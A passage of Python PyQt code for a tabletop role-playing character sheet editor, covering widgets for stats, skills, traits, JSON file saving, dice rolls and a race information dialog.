imageContainer.setFixedWidth(300)\r\n self.imageButton = QPushButton(\"Choose image\")\r\n self.imageButton.clicked.connect(self.setImagePath)\r\n \r\n imageLayout.addWidget(self.charImage)\r\n imageLayout.addWidget(self.imageButton)\r\n imageLayout.addStretch()\r\n \r\n #### RP stats\r\n \r\n rpStatsLayout = QGridLayout()\r\n rpStatsContainer = QWidget()\r\n rpStatsContainer.setLayout(rpStatsLayout)\r\n self.ageLabel = QLabel(\"Age:\")\r\n self.ageBox = QSpinBox()\r\n # self.ageBox.valueChanged.connect(lambda: self.update_file(show_update=False))\r\n self.heightLabel = QLabel(\"Height:\")\r\n self.heightBox = singleLineEdit()\r\n # self.heightBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.weightLabel = QLabel(\"Weight:\")\r\n self.weightBox = singleLineEdit()\r\n # self.weightBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.eyeLabel = QLabel(\"Eye Colour:\")\r\n self.eyeBox = singleLineEdit()\r\n # self.eyeBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.skinLabel = QLabel(\"Skin Colour:\")\r\n self.skinBox = singleLineEdit()\r\n # self.skinBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.hairLabel = QLabel(\"Hair Colour:\")\r\n self.hairBox = singleLineEdit()\r\n # self.hairBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n for box in [self.heightBox,self.weightBox,self.eyeBox,self.skinBox,self.hairBox]:\r\n box.setFixedWidth(75)\r\n box.setFixedHeight(25)\r\n \r\n rpStatsLayout.addWidget(self.ageLabel,0,0,1,1)\r\n rpStatsLayout.addWidget(self.ageBox,0,1,1,1)\r\n rpStatsLayout.addWidget(self.heightLabel,0,2,1,1)\r\n rpStatsLayout.addWidget(self.heightBox,0,3,1,1)\r\n rpStatsLayout.addWidget(self.weightLabel,1,0,1,1)\r\n rpStatsLayout.addWidget(self.weightBox,1,1,1,1)\r\n rpStatsLayout.addWidget(self.eyeLabel,1,2,1,1)\r\n rpStatsLayout.addWidget(self.eyeBox,1,3,1,1)\r\n rpStatsLayout.addWidget(self.skinLabel,2,0,1,1)\r\n rpStatsLayout.addWidget(self.skinBox,2,1,1,1)\r\n rpStatsLayout.addWidget(self.hairLabel,2,2,1,1)\r\n rpStatsLayout.addWidget(self.hairBox,2,3,1,1)\r\n \r\n rpLayout = QGridLayout()\r\n rpContainer = QWidget()\r\n rpContainer.setLayout(rpLayout)\r\n self.backgroundLabel = QLabel(\"Background:\")\r\n self.backgroundBox = QTextEdit()\r\n rpLayout.addWidget(self.backgroundLabel,0,0,1,1)\r\n rpLayout.addWidget(self.backgroundBox,1,0,1,1)\r\n \r\n notesLayout = QVBoxLayout()\r\n notesContainer = QWidget()\r\n notesContainer.setLayout(notesLayout)\r\n self.notesLabel = QLabel(\"Notes:\")\r\n self.notesBox = QTextEdit()\r\n notesLayout.addWidget(self.notesLabel)\r\n notesLayout.addWidget(self.notesBox)\r\n \r\n \r\n #### SKILLS TAB WIDGETS\r\n \r\n self.skillsLayout = QGridLayout()\r\n skillsWidget = QWidget()\r\n skillsWidget.setLayout(self.skillsLayout)\r\n \r\n headers = [\"Skill\",\"Ability Modifier\",\"Ability Bonus\", \"Proficiency\", \"Other modifiers\",\"Temp\",\"Total Skill Bonus\",\"Quick Roll\"]\r\n for index in range(0,len(headers)):\r\n headerWidget = QLabel(headers[index])\r\n headerWidget.setAlignment(Qt.AlignHCenter)\r\n self.skillsLayout.addWidget(headerWidget,0,index,1,1)\r\n \r\n self.skillsNameWidgets = []\r\n self.skillsStatsWidgets = []\r\n self.skillsModifsWidgets = []\r\n self.skillsProfsWidgets = []\r\n self.skillsManualWidgets = []\r\n self.skillsTempWidgets = []\r\n self.skillsTotalWidgets = []\r\n self.skillsRollWidgets = []\r\n for j,i in enumerate(info[\"skills\"]):\r\n self.skillsNameWidgets.append(QLabel(info[\"skills\"][i][\"name\"]))\r\n self.skillsLayout.addWidget(self.skillsNameWidgets[j],j+1,0,1,1)\r\n self.skillsStatsWidgets.append(QLabel(parseStat(info[\"skills\"][i][\"stat\"])))\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n self.skillsModifsWidgets.append(QLabel(\"0\"))\r\n self.skillsModifsWidgets[j].setAlignment(Qt.AlignHCenter)\r\n self.skillsLayout.addWidget(self.skillsModifsWidgets[j],j+1,2,1,1)\r\n profCheckBox = QCheckBox()\r\n profCheckBox.setTristate(True)\r\n self.skillsProfsWidgets.append(profCheckBox)\r\n self.skillsLayout.addWidget(self.skillsProfsWidgets[j],j+1,3,1,1)\r\n self.skillsManualWidgets.append(QSpinBox())\r\n self.skillsManualWidgets[j].setRange(-10,10)\r\n self.skillsManualWidgets[j].setFixedWidth(40)\r\n self.skillsManualWidgets[j].setAlignment(Qt.AlignCenter)\r\n self.skillsLayout.addWidget(self.skillsManualWidgets[j],j+1,4,1,1)\r\n self.skillsTempWidgets.append(QSpinBox())\r\n self.skillsTempWidgets[j].setRange(-10,10)\r\n self.skillsTempWidgets[j].setFixedWidth(40)\r\n self.skillsTempWidgets[j].setAlignment(Qt.AlignCenter)\r\n self.skillsLayout.addWidget(self.skillsTempWidgets[j],j+1,5,1,1)\r\n self.skillsTotalWidgets.append(QLabel())\r\n self.skillsTotalWidgets[j].setAlignment(Qt.AlignCenter)\r\n self.skillsTotalWidgets[j].setStyleSheet(\"font-weight: bold\")\r\n self.skillsLayout.addWidget(self.skillsTotalWidgets[j],j+1,6,1,1)\r\n self.skillsRollWidgets.append(rollWidget(self,file=self.file,skill=i,index=j))\r\n self.skillsLayout.addWidget(self.skillsRollWidgets[j],j+1,7,1,1)\r\n \r\n traitsMainLayout = QHBoxLayout()\r\n self.traitsLeftLayoutContainer = QWidget()\r\n self.traitsRightLayoutContainer = QWidget()\r\n self.traitsLeftLayout = QVBoxLayout()\r\n self.traitsRightLayout = QVBoxLayout()\r\n self.traitsLeftLayoutContainer.setLayout(self.traitsLeftLayout)\r\n self.traitsRightLayoutContainer.setLayout(self.traitsRightLayout)\r\n self.traitsOwnedTabs = QTabWidget()\r\n self.traitsOwnedMartialTab = QScrollArea()\r\n self.traitsOwnedLeymancyTab = QScrollArea()\r\n self.traitsOwnedProfessionTab = QScrollArea()\r\n self.traitsOwnedSubtletyTab = QScrollArea()\r\n \r\n self.traitsOwnedTabs.addTab(self.traitsOwnedLeymancyTab,\"Leymancy (0)\")\r\n self.traitsOwnedTabs.addTab(self.traitsOwnedMartialTab,\"Martial (0)\")\r\n self.traitsOwnedTabs.addTab(self.traitsOwnedProfessionTab,\"Profession (0)\")\r\n self.traitsOwnedTabs.addTab(self.traitsOwnedSubtletyTab,\"Subtlety (0)\")\r\n self.traitsLeftLayout.addWidget(self.traitsOwnedTabs)\r\n \r\n self.traitsInfoTabs = QTabWidget()\r\n self.traitsInfoMartialTab = QScrollArea()\r\n self.traitsInfoMartialTab.setSizePolicy(QSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding))\r\n self.traitsInfoLeymancyTab = QScrollArea()\r\n self.traitsInfoProfessionTab = QScrollArea()\r\n self.traitsInfoSubtletyTab = QScrollArea()\r\n \r\n self.traitsInfoMartialTabLayout = QVBoxLayout()\r\n self.traitsInfoLeymancyTabLayout = QVBoxLayout()\r\n self.traitsInfoProfessionTabLayout = QVBoxLayout()\r\n self.traitsInfoSubtletyTabLayout = QVBoxLayout()\r\n \r\n self.martialTabContainer = QWidget()\r\n self.leymancyTabContainer = QWidget()\r\n self.professionTabContainer = QWidget()\r\n self.subtletyTabContainer = QWidget()\r\n \r\n self.martialTabContainer.setLayout(self.traitsInfoMartialTabLayout)\r\n self.leymancyTabContainer.setLayout(self.traitsInfoLeymancyTabLayout)\r\n self.professionTabContainer.setLayout(self.traitsInfoProfessionTabLayout)\r\n self.subtletyTabContainer.setLayout(self.traitsInfoSubtletyTabLayout)\r\n \r\n \r\n self.traitsInfoMartialTab.setWidget(self.martialTabContainer)\r\n self.traitsInfoLeymancyTab.setWidget(self.leymancyTabContainer)\r\n self.traitsInfoProfessionTab.setWidget(self.professionTabContainer)\r\n self.traitsInfoSubtletyTab.setWidget(self.subtletyTabContainer)\r\n \r\n \r\n \r\n \r\n self.traitsInfoTabs.addTab(self.traitsInfoLeymancyTab,\"Leymancy\")\r\n self.traitsInfoTabs.addTab(self.traitsInfoMartialTab,\"Martial\")\r\n self.traitsInfoTabs.addTab(self.traitsInfoProfessionTab,\"Profession\")\r\n self.traitsInfoTabs.addTab(self.traitsInfoSubtletyTab,\"Subtlety\")\r\n self.traitsRightLayout.addWidget(self.traitsInfoTabs)\r\n \r\n self.traitsLeftLowerContainer = QWidget()\r\n self.traitsLeftLowerLayout = QVBoxLayout()\r\n self.traitsLeftLowerContainer.setLayout(self.traitsLeftLowerLayout)\r\n self.traitsLeftDelButton = QPushButton(\"Remove Trait\")\r\n self.traitsLeftLowerLayout.addWidget(self.traitsLeftDelButton)\r\n self.traitsLeftLowerLabel = QLabel(\" \")\r\n self.traitsLeftLowerLayout.addWidget(self.traitsLeftLowerLabel)\r\n \r\n self.traitsRightLowerContainer = QWidget()\r\n self.traitsRightLowerLayout = QVBoxLayout()\r\n self.traitsRightLowerContainer.setLayout(self.traitsRightLowerLayout)\r\n self.traitsRightAddButton = QPushButton(\"Add Trait\")\r\n self.traitsRightLowerLayout.addWidget(self.traitsRightAddButton)\r\n self.traitsRightLowerLabel = QLabel(\" \")\r\n self.traitsRightLowerLayout.addWidget(self.traitsRightLowerLabel)\r\n \r\n self.traitsRightLayout.addWidget(self.traitsRightLowerContainer)\r\n self.traitsLeftLayout.addWidget(self.traitsLeftLowerContainer)\r\n \r\n traitsMainLayout.addWidget(self.traitsLeftLayoutContainer)\r\n traitsMainLayout.addWidget(self.traitsRightLayoutContainer)\r\n \r\n skilltabLayout.addWidget(skillsWidget,0,0,1,1)\r\n \r\n #### COMBAT TAB WIDGETS\r\n \r\n \r\n #### TRAITS TAB WIDGETS\r\n \r\n updateButton = QPushButton()\r\n updateButton.setText(\"Update File\")\r\n updateButton.setFixedWidth(100)\r\n updateButton.clicked.connect(lambda: self.update_file(show_update=True))\r\n \r\n ####\r\n \r\n chartabLayout.addWidget(nameContainer,0,0,1,1)\r\n chartabLayout.addWidget(attrsContainer,1,0,1,1)\r\n chartabLayout.addWidget(raceContainer,2,0,1,1)\r\n chartabLayout.addWidget(heritageContainer,3,0,1,1)\r\n chartabLayout.addWidget(imageContainer,0,1,7,1)\r\n chartabLayout.addWidget(rpStatsContainer,4,0,1,1)\r\n chartabLayout.addWidget(rpContainer,5,0,4,1)\r\n chartabLayout.addWidget(notesContainer,7,1,1,1)\r\n GridLayout.addWidget(self.tabs)\r\n GridLayout.addWidget(updateButton,1,0,1,3)\r\n self.setLayout(GridLayout)\r\n self.chartab.setLayout(chartabLayout)\r\n self.skilltab.setLayout(skilltabLayout)\r\n self.traitstab.setLayout(traitsMainLayout)\r\n \r\n \r\n \r\n def onOpen(self):\r\n self.fileName = self.browseFile(ftypes = [(\"json Files\",\"*.json\")],directory=\"./characters/\")\r\n if len(self.fileName) > 0:\r\n print(\"File\",self.fileName,\"successfully loaded.\")\r\n self.changed_list = []\r\n self.starting = True\r\n self.update_gui()\r\n self.update_file(show_update=False)\r\n self.update_gui()\r\n self.show()\r\n else:\r\n print(\"File not loaded.\")\r\n \r\n def setImagePath(self):\r\n imagePath = self.browseFile(ftypes = [(\"image Files\",\"*.jpg *.png *.bmp\")],directory=\"./images/\")\r\n if imagePath: \r\n self.imagePath = imagePath\r\n self.update_file(show_update=False)\r\n else:\r\n pass\r\n \r\n def browseFile(self, ftypes,directory):\r\n currDir = os.getcwd()\r\n return filedialog.askopenfilename(filetypes = ftypes,initialdir = directory)\r\n \r\n \r\n def genRaceInfoWindow(self):\r\n self.raceInfoWindow = showRaceInfoWindow(file=self.file)\r\n self.raceInfoWindow.show()\r\n \r\n def genHeritageInfoWindow(self):\r\n self.heritageInfoWindow = showHeritageInfoWindow(file=self.file)\r\n self.heritageInfoWindow.show()\r\n \r\n def update_gui(self):\r\n if self.fileName == None:\r\n print(\"No file loaded\")\r\n pass\r\n else:\r\n if self.file == None:\r\n self.file = get_json(self.fileName) \r\n \r\n self.setWindowTitle(self.file[\"character\"])#\r\n \r\n ### Widgets\r\n \r\n self.nameBox.setPlainText(self.file[\"character\"])\r\n \r\n raceIndex = self.raceListBox.findText(self.file[\"race\"])\r\n self.raceListBox.setCurrentIndex(raceIndex)\r\n heritage = self.file[\"heritage\"]\r\n self.heritageList = []\r\n for i in info[\"races\"][self.file[\"race\"]][\"heritages\"]:\r\n self.heritageList.append(i)\r\n if self.heritageListBox.currentText() in self.heritageList:\r\n pass\r\n else:\r\n self.heritageListBox.clear()\r\n for j in self.heritageList:\r\n self.heritageListBox.addItem(j)\r\n heritageIndex = self.heritageListBox.findText(self.file[\"heritage\"])\r\n self.heritageListBox.setCurrentIndex(heritageIndex)\r\n \r\n age = int(self.file[\"rp_attributes\"][\"age\"])\r\n self.ageBox.setValue(age)\r\n \r\n pixmap = QPixmap(self.file[\"rp_attributes\"][\"image\"])\r\n self.charImage.setPixmap(pixmap)\r\n if self.imagePath == \"\":\r\n self.imagePath = self.file[\"rp_attributes\"][\"image\"]\r\n \r\n height = self.file[\"rp_attributes\"][\"height\"]\r\n self.heightBox.setText(height)\r\n weight = self.file[\"rp_attributes\"][\"weight\"]\r\n self.weightBox.setText(weight)\r\n eyes = self.file[\"rp_attributes\"][\"eyes\"]\r\n self.eyeBox.setText(eyes)\r\n skin = self.file[\"rp_attributes\"][\"skin\"]\r\n self.skinBox.setText(skin)\r\n hair = self.file[\"rp_attributes\"][\"hair\"]\r\n self.hairBox.setText(hair)\r\n \r\n for j in range(0,len(self.skillsNameWidgets)):\r\n # Name widgets\r\n skill = self.skillsNameWidgets[j].text()\r\n if self.starting:\r\n if info[\"skills\"][skill][\"stat\"] == \"STAT:ANY\":\r\n # Add a selection of stat to add\r\n self.skillsLayout.removeWidget(self.skillsStatsWidgets[j])\r\n self.skillsStatsWidgets[j].setParent(None)\r\n self.skillsStatsWidgets[j] = statSelectBox(stats = \"Any\")\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n elif info[\"skills\"][skill][\"stat\"] == \"STAT:PHYSICAL\":\r\n self.skillsLayout.removeWidget(self.skillsStatsWidgets[j])\r\n self.skillsStatsWidgets[j].setParent(None)\r\n self.skillsStatsWidgets[j] = statSelectBox(stats = \"Any Physical\")\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n elif info[\"skills\"][skill][\"stat\"] == \"STAT:MENTAL\":\r\n self.skillsLayout.removeWidget(self.skillsStatsWidgets[j])\r\n self.skillsStatsWidgets[j].setParent(None)\r\n self.skillsStatsWidgets[j] = statSelectBox(stats = \"Any Mental\")\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n \r\n try:\r\n self.skillsStatsWidgets[j].setCurrentIndex(self.skillsStatsWidgets[j].getIndex(self.file[\"skills\"][skill][\"stat\"]))\r\n except:\r\n self.skillsStatsWidgets[j].setText(parseStat(self.file[\"skills\"][skill][\"stat\"]))\r\n \r\n statName = self.skillsStatsWidgets[j].text()\r\n for stat,statDict in info[\"modifiers\"].items():\r\n if statDict[\"name\"] == statName:\r\n statModif = getMainStatModif(self.file[\"stats\"][stat])\r\n self.skillsModifsWidgets[j].setText(str(statModif))\r\n \r\n proficiency = int(self.file[\"skills\"][skill][\"proficiency\"])\r\n if self.starting:\r\n self.skillsProfsWidgets[j].setCheckState(proficiency)\r\n self.skillsProfsWidgets[j].stateChanged.connect(lambda: self.update_file(show_update=False))\r\n self.skillsProfsWidgets[j].setText(parseProficiency(proficiency))\r\n proficiencyModifier = int(self.file[\"stats\"][\"STAT:PROF\"])\r\n proficiencyBonus = proficiency * proficiencyModifier\r\n \r\n manualVal = int(self.file[\"skills\"][skill][\"manual\"])\r\n if self.starting:\r\n self.skillsManualWidgets[j].setValue(manualVal)\r\n self.skillsManualWidgets[j].valueChanged.connect(lambda: self.update_file(show_update=False))\r\n \r\n tempVal = self.skillsTempWidgets[j].value()\r\n if self.starting:\r\n self.skillsTempWidgets[j].valueChanged.connect(lambda: self.update_file(show_update=False))\r\n \r\n total = proficiencyBonus + manualVal + tempVal + int(statModif)\r\n self.skillsTotalWidgets[j].setText(str(total))\r\n \r\n \r\n modifs = []\r\n for category in self.file[\"traits\"]:\r\n for trait in self.file[\"traits\"][category]:\r\n if len(info[\"traits\"][category][trait][\"modifiers\"]) > 0: \r\n modifs.append(info[\"traits\"][category][trait][\"modifiers\"])\r\n for ability in info[\"races\"][self.file[\"race\"]][\"abilities\"]:\r\n if len(info[\"races\"][self.file[\"race\"]][\"abilities\"][ability]) > 0:\r\n modifs.append(info[\"races\"][self.file[\"race\"]][\"abilities\"][ability][\"modifiers\"])\r\n try:\r\n if len(info[\"races\"][self.file[\"race\"]][\"heritages\"][self.file[\"heritage\"]][\"modifiers\"]) > 0:\r\n modifs.append(info[\"races\"][self.file[\"race\"]][\"heritages\"][self.file[\"heritage\"]][\"modifiers\"])\r\n except:\r\n pass\r\n modifsDict = genModifsDict(modifs)\r\n # If there are any other things that give modifiers, add here!\r\n \r\n \r\n manualStatsTotals = 0\r\n for j in range(0,len(self.attrsLabels)):\r\n attr = self.attrsLabels[j].text()\r\n attrString = deParseStat(attr)\r\n race = self.file[\"race\"]\r\n minVal = info[\"races\"][race][\"startingStats\"][j]\r\n maxVal = info[\"races\"][race][\"maxStats\"][j]\r\n self.attrsMinLabels[j].setText(str(minVal))\r\n self.attrsMaxLabels[j].setText(str(maxVal))\r\n try:\r\n traits_val = modifsDict[attrString]\r\n except:\r\n traits_val = 0\r\n self.attrsTraits[j].setText(str(traits_val))\r\n if self.starting:\r\n self.attrsTraits[j].setAlignment(Qt.AlignCenter)\r\n \r\n total = self.file[\"stats\"][attrString]\r\n manualVal = total - minVal - traits_val\r\n self.attrsTotals[j].setText(str(total))\r\n self.attrsTotals[j].setAlignment(Qt.AlignCenter)\r\n self.attrsManual[j].setValue(manualVal)\r\n manualStatsTotals += manualVal\r\n \r\n \r\n \r\n else:\r\n manual = int(self.attrsManual[j].value())\r\n manualStatsTotals += manual\r\n total = minVal + manual + traits_val\r\n \r\n self.attrsTotals[j].setText(str(total))\r\n self.attrsTotals[j].setAlignment(Qt.AlignCenter)\r\n \r\n if total > maxVal:\r\n self.attrsTotals[j].setStyleSheet(\"QLabel {color:red}\")\r\n else:\r\n self.attrsTotals[j].setStyleSheet(\"QLabel {color:white}\")\r\n self.attrsBonus[j].setText(\"(%+d\" %getMainStatModif(int(self.attrsTotals[j].text()))+\")\")\r\n \r\n self.ptsSpent.setText(\"Points Spent: %i\" %manualStatsTotals)\r\n \r\n # populate traits list\r\n \r\n # if starting: populate traits explorer\r\n \r\n if self.starting:\r\n self.traitsInfoWidgets = []\r\n for category,layout in [[\"leymancy\",self.traitsInfoLeymancyTabLayout],[\"martial\",self.traitsInfoMartialTabLayout,],[\"profession\",self.traitsInfoProfessionTabLayout],[\"subtlety\",self.traitsInfoSubtletyTabLayout]]:\r\n traits = info[\"traits\"][category]\r\n for trait in traits.keys():\r\n traitWidget = traitContainer(self,category=category,trait=trait)\r\n # traitWidget.clicked.connect(self.update_gui())\r\n self.traitsInfoWidgets.append(traitWidget)\r\n layout.addWidget(self.traitsInfoWidgets[-1])\r\n \r\n self.martialTabContainer.adjustSize()\r\n self.leymancyTabContainer.adjustSize()\r\n self.professionTabContainer.adjustSize()\r\n self.subtletyTabContainer.adjustSize()\r\n \r\n for traitWidget in self.traitsInfoWidgets:\r\n traitWidget.update()\r\n \r\n self.starting = False\r\n \r\n \r\n \r\n def update_file(self,show_update=False):\r\n if self.fileName == None:\r\n print(\"No file loaded\")\r\n pass\r\n else:\r\n if self.file == None:\r\n self.file = get_json(self.fileName)\r\n \r\n ### Widgets\r\n \r\n if self.file[\"character\"] != self.nameBox.toPlainText():\r\n self.file[\"character\"] = self.nameBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Character name -> \", self.nameBox.toPlainText()]))\r\n \r\n \r\n if self.file[\"race\"] != self.raceListBox.currentText():\r\n self.file[\"race\"] = self.raceListBox.currentText()\r\n self.changed_list.append(\"\".join([\"Race -> \", self.raceListBox.currentText()]))\r\n self.update_gui()\r\n \r\n if self.file[\"heritage\"] != self.heritageListBox.currentText():\r\n self.file[\"heritage\"] = self.heritageListBox.currentText()\r\n self.changed_list.append(\"\".join([\"Heritage -> \", self.heritageListBox.currentText()]))\r\n \r\n if self.file[\"rp_attributes\"][\"age\"] != self.ageBox.value():\r\n self.file[\"rp_attributes\"][\"age\"] = self.ageBox.value()\r\n self.changed_list.append(\"\".join([\"Age -> \", str(self.ageBox.value())]))\r\n \r\n if self.file[\"rp_attributes\"][\"height\"] != self.heightBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"height\"] = self.heightBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Height -> \", str(self.heightBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"weight\"] != self.weightBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"weight\"] = self.weightBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Weight -> \", str(self.weightBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"eyes\"] != self.eyeBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"eyes\"] = self.eyeBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Eye colour -> \", str(self.eyeBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"skin\"] != self.skinBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"skin\"] = self.skinBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Skin colour -> \", str(self.skinBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"hair\"] != self.hairBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"hair\"] = self.hairBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Hair colour -> \", str(self.hairBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"background\"] != self.backgroundBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"background\"] = self.backgroundBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Background modified\"]))\r\n \r\n if self.file[\"rp_attributes\"][\"notes\"] != self.notesBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"notes\"] = self.notesBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Notes modified\"]))\r\n \r\n if self.file[\"rp_attributes\"][\"image\"] != self.imagePath:\r\n self.file[\"rp_attributes\"][\"image\"] = self.imagePath\r\n self.changed_list.append(\"\".join([\"Image path -> \",str(self.imagePath)]))\r\n \r\n for index,skillWidget in enumerate(self.skillsNameWidgets):\r\n skill = skillWidget.text()\r\n if self.skillsProfsWidgets[index].checkState() != self.file[\"skills\"][skill][\"proficiency\"]:\r\n self.file[\"skills\"][skill][\"proficiency\"] = self.skillsProfsWidgets[index].checkState()\r\n self.changed_list.append(\"\".join([skill,\" proficiency -> \",parseProficiency(self.file[\"skills\"][skill][\"proficiency\"])]))\r\n # Update proficiencies\r\n if self.skillsStatsWidgets[index].text() != parseStat(self.file[\"skills\"][skill][\"stat\"]):\r\n try: \r\n self.file[\"skills\"][skill][\"stat\"] = self.skillsStatsWidgets[index].text()\r\n self.changed_list.append(\"\".join([skill,\" stat -> \",self.file[\"skills\"][skill][\"stat\"]]))\r\n except:\r\n pass\r\n if self.skillsManualWidgets[index].value() != int(self.file[\"skills\"][skill][\"manual\"]):\r\n self.file[\"skills\"][skill][\"manual\"] = self.skillsManualWidgets[index].value()\r\n \r\n if int(self.skillsTotalWidgets[index].text()) != self.file[\"skills\"][skill][\"value\"]:\r\n self.file[\"skills\"][skill][\"value\"] = int(self.skillsTotalWidgets[index].text())\r\n \r\n for index, totalWidget in enumerate(self.attrsTotals):\r\n if totalWidget.text() == \"\":\r\n pass\r\n else:\r\n total = int(totalWidget.text())\r\n stat = self.attrsLabels[index].text()\r\n stat_string = deParseStat(stat)\r\n if total != self.file[\"stats\"][stat_string]:\r\n self.file[\"stats\"][stat_string] = total\r\n \r\n with open(self.fileName,\"w\") as f: \r\n json.dump(self.file,f,indent=4,sort_keys=True)\r\n \r\n self.update_gui()\r\n if show_update:\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Updater\")\r\n msg.setText(\"File Updated!\")\r\n msg.setDetailedText(\"\\n\".join(self.changed_list))\r\n msg.setStandardButtons(QMessageBox.Ok)\r\n msg.exec_()\r\n self.changed_list = []\r\n \r\n \r\nclass rollWidget(QLabel):\r\n clicked = pyqtSignal()\r\n def __init__(self,parent,file=None,skill=\"Athletics\",index=0):\r\n super(rollWidget,self).__init__(parent)\r\n # self.file = file\r\n self.skill = skill\r\n self.index = index\r\n self.setFixedSize(25,25)\r\n dieImgFile = \"./bin/d20.png\"\r\n self.pixmap = QPixmap(dieImgFile)\r\n self.setPixmap(self.pixmap)\r\n self.clicked.connect(self.roll)\r\n \r\n def mouseReleaseEvent(self,QMouseEvent):\r\n if QMouseEvent.button() == Qt.LeftButton:\r\n self.clicked.emit()\r\n \r\n def roll(self):\r\n self.file = self.parent().parent().parent().parent().parent().file\r\n bonus = self.parent().parent().parent().parent().parent().skillsTotalWidgets[self.index].text()\r\n bonus = int(bonus)\r\n roll = math.ceil(np.random.rand()*20)\r\n total = int(bonus + roll)\r\n msg = QMessageBox()\r\n msg.setText(\"\".join([self.skill,\" roll: \\n\",str(total), \" (\",str(roll) + \"%+d\" %bonus,\")\"]))\r\n msg.setWindowTitle(self.skill)\r\n msg.exec()\r\n \r\nclass showRaceInfoWindow(QDialog):\r\n def __init__(self,parent=None,file=None):\r\n super(showRaceInfoWindow, self).__init__(parent) \r\n self.file = file\r\n self.setFixedWidth(600)\r\n \r\n mainLayout = QVBoxLayout()\r\n ### GET INFO\r\n race = self.file[\"race\"]\r\n self.setWindowTitle(race)\r\n raceDescription = info[\"races\"][race][\"description\"]\r\n baseHP = info[\"races\"][race][\"baseHP\"]\r\n baseSpeed = info[\"races\"][race][\"baseSpeed\"]\r\n size = info[\"races\"][race][\"size\"]\r\n abilitiesNames = []\r\n abilitiesDescriptions = []\r\n abilitiesModifiers = []\r\n for ability in info[\"races\"][race][\"abilities\"]:\r\n abilitiesNames.append(info[\"races\"][race][\"abilities\"][ability][\"name\"])\r\n abilitiesDescriptions.append(info[\"races\"][race][\"abilities\"][ability][\"description\"])\r\n abilitiesModifiers.append(info[\"races\"][race][\"abilities\"][ability][\"modifiers\"])\r\n startingStats = []\r\n for ststat in info[\"races\"][race][\"startingStats\"]:\r\n startingStats.append(ststat)\r\n maxStats = []\r\n for maxstat in info[\"races\"][race][\"maxStats\"]:\r\n maxStats.append(maxstat)\r\n ### IMAGE\r\n imageLayout = QVBoxLayout()\r\n imageContainer = QWidget()\r\n imageContainer.setLayout(imageLayout)\r\n raceImage = QLabel()\r\n imageContainer.setFixedHeight(300)\r\n imageContainer.setFixedWidth(300)\r\n pixmap = QPixmap(info[\"races\"][race][\"image\"])\r\n raceImage.setPixmap(pixmap)\r\n \r\n imageLayout.addWidget(raceImage)\r\n # imageLayout.addStretch()\r\n \r\n upperLayout = QHBoxLayout()\r\n upperContainer = QWidget()\r\n upperContainer.setLayout(upperLayout)\r\n \r\n ### DESCRIPTION\r\n RILayout = QGridLayout()\r\n RIContainer = QWidget()\r\n RIContainer.setLayout(RILayout)\r\n titleLabel1 = QLabel(\"Race: \")\r\n titleLabel2 = QLabel(race)\r\n descLabel1 = QLabel(\"Description: \")\r\n descLabel1.setAlignment(Qt.AlignTop)\r\n descLabel2=QLabel(raceDescription)\r\n descLabel2.setWordWrap(True)\r\n hpLabel1 = QLabel(\"Base HP: \")\r\n hpLabel2 = QLabel(str(baseHP))\r\n spdLabel1 = QLabel(\"Base Speed: \")\r\n spdLabel2 = QLabel(\" \".join([str(baseSpeed),\"ft\"]))\r\n sizeLabel1 = QLabel(\"Size: \")\r\n sizeLabel2 = QLabel(str(size))\r\n \r\n \r\n upperLayout.addWidget(RIContainer)\r\n upperLayout.addWidget(imageContainer)\r\n \r\n RILayout.addWidget(titleLabel1,0,0,1,1)\r\n RILayout.addWidget(titleLabel2,0,1,1,1)\r\n RILayout.addWidget(descLabel1,1,0,1,1)\r\n RILayout.addWidget(descLabel2,1,1,1,1)\r\n RILayout.addWidget(hpLabel1,2,0,1,1)\r\n RILayout.addWidget(hpLabel2,2,1,1,1)\r\n RILayout.addWidget(spdLabel1,3,0,1,1)\r\n RILayout.addWidget(spdLabel2,3,1,1,1)\r\n RILayout.addWidget(sizeLabel1,4,0,1,1)\r\n RILayout.addWidget(sizeLabel2,4,1,1,1)\r\n ### ABILITIES\r\n abLayout = QGridLayout()\r\n abContainer = QWidget()\r\n abContainer.setLayout(abLayout)\r\n \r\n abTitle = QLabel(\"Abilities:\")\r\n abDesc = QLabel(\"Description:\")\r\n abMod = QLabel(\"Modifiers:\")\r\n abilityNameWidgets = []\r\n abilityDescriptionWidgets = []\r\n abilityModifierWidgets = []\r\n if len(abilitiesNames) == len(abilitiesDescriptions) and len(abilitiesNames) == len(abilitiesModifiers):\r\n for i in range(0,len(abilitiesNames)):\r\n abilityNameWidgets.append(QLabel(abilitiesNames[i]))\r\n abilityNameWidgets[i].setAlignment(Qt.AlignTop)\r\n abilityDescriptionWidgets.append(QLabel(abilitiesDescriptions[i]))\r\n abilityDescriptionWidgets[i].setWordWrap(True)\r\n 